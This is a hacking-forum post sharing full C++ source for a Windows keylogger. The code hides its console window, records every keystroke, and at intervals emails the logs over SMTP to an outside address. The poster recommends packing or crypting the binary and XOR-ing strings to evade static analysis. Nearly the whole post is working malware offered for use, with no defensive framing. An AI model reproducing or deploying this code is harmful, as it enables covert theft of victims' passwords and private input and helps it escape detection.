OP 08 September, 2020 - 05:06 AM
Here's the code for my (simple) keylogger. Just threw this together in like 20 minutes, so please forgive sloppy coding and or bugs.
Just a naive approach on a keylogger, I'd recommend packing or crypting it (although it shouldn't be detected by itself) and adding protection against static analysis such as XOR'ing the strings.
It would of course be smart to change your email servers etc...
Anyway, if you like it give me popularity or say thanks or something, idk.
Your Welcome
+REP Me
Just a naive approach on a keylogger, I'd recommend packing or crypting it (although it shouldn't be detected by itself) and adding protection against static analysis such as XOR'ing the strings.
It would of course be smart to change your email servers etc...
Anyway, if you like it give me popularity or say thanks or something, idk.
Code:
#define _CRT_SECURE_NO_WARNINGS
#define _WINSOCK_DEPRECATED_NO_WARNINGS
#include <WS2tcpip.h>
#include <thread>
#include <string>
#pragma comment (lib, "ws2_32.lib")
#pragma warning(disable : 6387)
const int buf_size = 8192;
const int log_len = 128;
void send_rcv(SOCKET sock, std::string line, char*& buf) { send(sock, line.c_str(), strlen(line.c_str()), 0); recv(sock, buf, buf_size, 0); }
void send_mail(std::string mail_message) {
static const std::string mail_server = "gmail-smtp-in.l.google.com";
static const std::string mail_to = "[email protected]";
static const std::string mail_from = "[email protected]";
static const std::string mail_subject = "logger report";
SOCKET sock;
WSADATA wsa_data;
struct hostent* host;
struct sockaddr_in dest_addr;
std::string line;
char* buf = (char*)malloc(buf_size + 1);
if (WSAStartup(MAKEWORD(2, 2), &wsa_data) == SOCKET_ERROR) { WSACleanup(); exit(-1); }
if ((host = gethostbyname(mail_server.c_str())) == NULL) { WSACleanup(); exit(-1); }
memset(&dest_addr, 0, sizeof(dest_addr));
memcpy(&(dest_addr.sin_addr), host->h_addr, host->h_length);
dest_addr.sin_family = host->h_addrtype;
dest_addr.sin_port = htons(25);
if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0) { exit(-1); }
if (connect(sock, (struct sockaddr*) & dest_addr, sizeof(dest_addr)) == -1) { exit(-1); }
recv(sock, buf, buf_size, 0);
send_rcv(sock, "helo name.your.tld\n", buf);
send_rcv(sock, "MAIL FROM:<" + mail_from + ">\n", buf);
send_rcv(sock, "RCPT TO:<" + mail_to + ">\n", buf);
send_rcv(sock, "DATA\n", buf);
send_rcv(sock, "To:" + mail_to + "\n" + "From:" + mail_from + "\n" + "Subject:" + mail_subject + "\n" + mail_message + "\r\n.\r\n", buf);
send_rcv(sock, "quit\n", buf);
closesocket(sock);
WSACleanup();
free(buf);
}
int main(void)
{
::ShowWindow(::GetConsoleWindow(), SW_HIDE);
std::string last_report;
time_t le_time = time(0);
last_report += "started logging at: " + std::string(ctime(&le_time));
while (1) {
std::this_thread::sleep_for(std::chrono::milliseconds(10));
for (short character = 8; character <= 222; character++) {
if (GetAsyncKeyState(character) == -32767) {
if (character >= 39 && character <= 64) { last_report += (char)character; break; }
else if ((character > 64) && (character < 91)) { character += 32; last_report += (char)character; break; }
else {
switch (character) {
case VK_SPACE: last_report += ' '; break;
case VK_SHIFT: last_report += "\r\n[SHIFT]\r\n"; break;
case VK_RETURN: last_report += "\r\n[ENTER]\r\n"; break;
case VK_BACK: last_report += "\r\n[BACKSPACE]\r\n"; break;
case VK_TAB: last_report += "\r\n[TAB]\r\n"; break;
case VK_CONTROL: last_report += "\r\n[CTRL]\r\n"; break;
case VK_DELETE: last_report += "\r\n[DEL]\r\n"; break;
case VK_OEM_1: last_report += "\r\n[;:]\r\n"; break;
case VK_OEM_2: last_report += "\r\n[/?]\r\n"; break;
case VK_OEM_3: last_report += "\r\n[`~]\r\n"; break;
case VK_OEM_4: last_report += "\r\n[ [{ ]\r\n"; break;
case VK_OEM_5: last_report += "\r\n[\\|]\r\n"; break;
case VK_OEM_6: last_report += "\r\n[ ]} ]\r\n"; break;
case VK_OEM_7: last_report += "\r\n['\"]\r\n"; break;
case 187: last_report += '+'; break;
case 188: last_report += ','; break;
case 189: last_report += '-'; break;
case 190: last_report += '.'; break;
case VK_NUMPAD0: last_report += '0'; break;
case VK_NUMPAD1: last_report += '1'; break;
case VK_NUMPAD2: last_report += '2'; break;
case VK_NUMPAD3: last_report += '3'; break;
case VK_NUMPAD4: last_report += '4'; break;
case VK_NUMPAD5: last_report += '5'; break;
case VK_NUMPAD6: last_report += '6'; break;
case VK_NUMPAD7: last_report += '7'; break;
case VK_NUMPAD8: last_report += '8'; break;
case VK_NUMPAD9: last_report += '9'; break;
case VK_CAPITAL: last_report += "\r\n[CAPS LOCK]\r\n"; break;
}
}
}
}
if (last_report.length() >= log_len) { send_mail(last_report); last_report.clear(); }
}
return EXIT_SUCCESS;
}
Your Welcome
+REP Me